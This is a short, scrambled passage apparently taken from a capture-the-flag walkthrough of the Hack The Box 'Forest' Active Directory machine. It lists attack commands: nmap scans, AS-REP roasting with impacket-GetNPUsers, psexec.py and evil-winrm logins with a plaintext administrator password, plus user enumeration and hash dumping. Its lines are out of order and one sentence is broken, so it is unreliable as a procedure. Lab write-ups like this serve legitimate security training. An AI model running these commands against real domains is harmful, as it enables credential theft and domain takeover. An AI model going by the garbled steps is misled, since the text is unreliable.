Useful commands inside rpcclient:
Guest DefaultAccount Administrator sebastien lucinda andrea santi ...
We then use the tool to gather more information about the domain.
Foothold achieved without a single brute-force password guess.
In this walkthrough, we will cover the enumeration of a Domain Controller, exploiting a misconfiguration to gain an initial foothold, performing privilege escalation via ACLs, and finally dumping the domain hashes to capture the root flag.
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001 -sV -sC -O -oA forest_scan 10.10.10.161
BloodHound reveals that svc-account is a member of the group.
Exploiting Group Policy
Navigate to C:\Users\Administrator\Desktop and grab root.txt.
python psexec.py forest.htb/administrator@forest.htb
impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -usersfile users.txt -format hashcat -outputfile asreproast.hashes
Start with an aggressive Nmap scan to discover open ports and running services.
nmap -sC -sV -p- -T4 -oN forest_nmap.txt 10.10.10.161
Key ports discovered indicate an Active Directory environment.
Once we have cracked the , we can use it to gain access to the domain.
evil-winrm -i 10.10.10.161 -u Administrator -p 'ThePassword123'